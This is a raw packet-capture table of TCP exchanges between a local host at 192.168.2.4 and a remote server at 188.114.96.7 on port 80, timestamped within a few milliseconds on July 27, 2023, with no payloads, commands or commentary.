Jul 27, 2023 20:18:45.547692060 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547708035 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547728062 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547739983 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547749043 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547771931 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547779083 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547791958 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547806978 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547811985 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547832012 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547838926 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547852039 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547873020 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547879934 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547893047 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547914028 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547930956 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547935963 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547955990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547966957 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547976017 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547996044 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548017025 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548026085 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.548048973 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.548260927 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548331976 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548352957 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548374891 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548398018 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548422098 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548425913 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.548445940 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548453093 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.548485041 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548506021 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548518896 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.548527002 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548547029 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548583984 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.548624039 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.548696041 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548717022 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548737049 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548758984 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548778057 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.548779964 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548799992 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548820972 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548825979 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.548842907 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548852921 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.548862934 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.548891068 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.549290895 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549315929 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549335957 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549350023 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549371004 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549372911 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.549391985 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549410105 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.549413919 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549434900 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549443960 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.549457073 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549477100 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549498081 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549519062 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549537897 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549552917 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.549552917 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.549567938 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.549581051 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549598932 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.549602985 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549623013 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549644947 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549663067 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.549664974 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549685955 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549695969 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.549706936 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.549766064 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.550194979 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550219059 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550240993 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550261974 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550282955 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550293922 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.550303936 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550323963 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550328970 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.550344944 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550359964 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.550367117 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550386906 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550388098 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.550406933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550429106 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550470114 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550472975 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.550472975 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.550489902 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550510883 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550529957 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550540924 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.550544977 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550559044 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550571918 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550585985 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.550681114 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.551085949 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551115990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551137924 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551158905 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551167011 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.551179886 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551206112 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.551225901 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551238060 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.551248074 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551270962 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551290989 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551310062 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.551312923 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551332951 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551352978 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551363945 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.551373005 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551393986 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551409960 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.551413059 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551420927 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.551436901 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551460981 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551476955 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.551481009 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551502943 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551520109 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.551523924 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.551556110 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552000999 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552030087 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552051067 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552071095 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552072048 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552092075 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552124023 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552136898 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552136898 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552158117 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552171946 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552196980 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552215099 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552247047 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552315950 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552467108 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552498102 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552519083 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552539110 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552558899 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552565098 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552580118 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552601099 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552608013 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552614927 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552629948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552649975 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552664042 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552665949 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552675962 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552679062 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552700996 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552768946 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552779913 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552782059 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552802086 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552822113 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552839994 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552855015 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552860975 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552881956 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552886963 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552902937 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552923918 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.552934885 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.552968025 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.553369045 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553412914 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553445101 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553467035 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553486109 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553508997 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553519964 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.553529978 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553549051 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.553550959 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553570032 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.553572893 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553594112 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553600073 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.553613901 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553643942 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.553657055 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553677082 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553699017 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553714991 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.553720951 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553740978 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.553742886 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553764105 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553785086 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.553791046 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553811073 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553833008 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553838015 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.553853989 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.553879976 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.554369926 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554398060 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554418087 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554439068 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554461002 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.554465055 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554486036 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554497957 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.554506063 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554512978 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.554527998 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554572105 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.554657936 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554680109 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554701090 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554733038 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.554744005 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554788113 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.554790974 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554812908 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554831982 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554847956 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554867983 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554883957 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.554889917 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554910898 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554933071 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554938078 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.554951906 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554971933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.554976940 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.554991961 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555012941 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555015087 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.555027008 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555059910 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555080891 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555082083 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.555102110 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555123091 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555126905 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.555144072 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555172920 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.555613995 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555639982 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555660009 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555680037 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555701017 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555701017 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.555721998 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555744886 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.555753946 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.555767059 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555789948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555819988 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555840015 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555860996 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555876970 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.555883884 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555906057 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555912971 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.555927038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555947065 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555965900 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.555985928 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556005001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556024075 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556030989 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.556046009 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556066990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556077003 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.556103945 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556154013 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.556732893 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556761980 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556787014 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556808949 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556830883 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556854010 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556855917 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.556874990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556879997 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.556895971 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556910038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556929111 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556942940 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.556950092 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556967020 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.556969881 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.556991100 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557013035 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557033062 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.557050943 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557073116 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557090998 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.557094097 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557113886 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557133913 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.557135105 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557156086 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557173967 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.557177067 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557199001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557216883 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.557564974 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557621002 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.557626963 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557648897 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557671070 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557686090 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557704926 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557725906 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.557727098 CEST	49683	80	192.168.2.4	188.114.96.7
